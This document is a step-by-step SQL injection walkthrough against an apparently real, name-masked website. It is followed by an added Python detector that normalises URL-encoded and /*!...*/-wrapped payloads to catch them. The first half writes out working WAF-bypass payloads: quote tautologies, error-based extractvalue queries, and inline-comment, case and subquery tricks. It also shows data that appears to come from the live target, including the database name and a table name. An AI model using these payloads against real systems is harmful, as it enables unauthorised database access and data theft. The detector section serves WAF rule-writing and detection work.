1. Target: https://[某站点]/new.php?id=
2. WAF bypass: determining how to close the quote
?id=1' --+ //error shows ''' -> --+ is filtered. Any of the following gets through:
?id=1' or '1'='1
?id=1' and '1'='1
?id=1' || '1'='1
Error-based injection: database name
?id=1%27%20||%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%20||%20%271%27=%271 //XPATH syntax error: '~iibnbnet_unidatabase~'
Error-based injection: table name
?id=1%27%20||%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27iibnbnet_unidatabase%27%20limit%200,1),0x7e))%20||%20%271%27=%271 //nothing returned, the statement as a whole is true -> the table-name query is being filtered
Inline comments:
1%27%20||%20extractvalue(1,concat(0x7e,(/*!select*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!where*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271 //nothing returned, the statement as a whole is true
Case variation:
id=1%27%20||%20extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271 //nothing returned, the statement as a whole is true
Hex encoding: //nothing returned, the statement as a whole is true
Recalled that the \ from step one can make the server echo the SQL before and after the injection point, which shows whether part of the statement is being filtered. Substituting the words of the query one at a time showed that none of them is filtered on its own, so the WAF must be matching on the combination.
Wrap the whole statement in an inline comment:
?id=1%27%20||%20/*!extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))*/%20||%20%271%27=%271 //You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ || '1'='1'' at line 1 //possibly the ")" + "*" sequence is filtered, so the closing comment marker did not take effect
Move the closing comment marker to the very end:
?id=1%27%20||%20/*!extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271*/ //table name retrieved successfully //XPATH syntax error: '~uni_albumlist~'
Moving the opening /*! further forward also bypasses it:
?id=1/*!%27%20||%20extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271*/ //XPATH syntax error: '~uni_albumlist~'
A subquery also bypasses the WAF:
?id=1=(SELECT%201%20FROM%20dual%20WHERE%201%27%20||extractvalue(1,concat(0x7e,(/*!select*/%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20like%20%27iibnbnet_unidatabase%27),0x7e))||%20%271%27=%271) //everything after WHERE is our original payload
Column names and the table contents are extracted afterwards with the same method, which bypasses the WAF in the same way.
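As an added defender-side example (not part of the original write-up): a Python normalizer that undoes the URL encoding, the /*!...*/ inline comments and the case changes used above before applying signatures, so the rules match the SQL that MySQL would actually execute rather than the WAF-facing surface form. The sample query strings are constructed from the payload shapes in this write-up with the database name replaced by the placeholder x.

```python
import re
from urllib.parse import unquote

# Constructed sample query strings modelled on the payload shapes in this
# write-up (database name replaced by the placeholder 'x').
SAMPLES = {
    "benign": "id=1",
    "plain": "id=1%27%20||%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%20||%20%271%27=%271",
    "inline_comment": "id=1%27%20||%20/*!extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/"
                      "%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27x%27*/"
                      "%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271*/",
    "subquery": "id=1=(SELECT%201%20FROM%20dual%20WHERE%201%27%20||extractvalue(1,concat(0x7e,(/*!select*/"
                "%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema"
                "%20like%20%27x%27),0x7e))||%20%271%27=%271)",
}

PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)   # /* ... */ : MySQL ignores the body
VERSION_MARK = re.compile(r"/\*!\d{0,6}|\*/")         # /*! , /*!50000 , */ : body IS executed

RULES = [
    ("error_based_xpath", re.compile(r"\bextractvalue\s*\(")),
    ("schema_enumeration", re.compile(r"\binformation_schema\.")),
    ("select_from", re.compile(r"\bselect\b.*?\bfrom\b")),
    ("quote_tautology", re.compile(r"(?:\bor\b|\|\|)\s*'1'\s*=\s*'1")),
]

def normalize(raw: str) -> str:
    """Reduce a parameter value to the SQL text MySQL would actually see."""
    value, prev = raw, None
    while value != prev:                  # decode until stable (handles double encoding)
        prev, value = value, unquote(value)
    value = PLAIN_COMMENT.sub(" ", value)  # drop ordinary comments used as spacing tricks
    value = VERSION_MARK.sub(" ", value)   # unwrap /*!...*/ but keep what is inside it
    return re.sub(r"\s+", " ", value).strip().lower()   # case bypass: sElect -> select

def detect(query_string: str) -> list[str]:
    """Return 'param:rule' for every rule that matches a normalized parameter value."""
    hits = []
    for part in query_string.split("&"):
        name, _, raw = part.partition("=")   # split at the first '=' only; payloads contain '='
        norm = normalize(raw)
        hits.extend(f"{name}:{rule}" for rule, pat in RULES if pat.search(norm))
    return sorted(set(hits))

if __name__ == "__main__":
    for label, qs in SAMPLES.items():
        print(f"{label:15} {detect(qs)}")
```

The same signatures that miss the raw /*!sElect*/ form fire on the normalized text, which is the check a WAF rule author would want to confirm after reading this bypass.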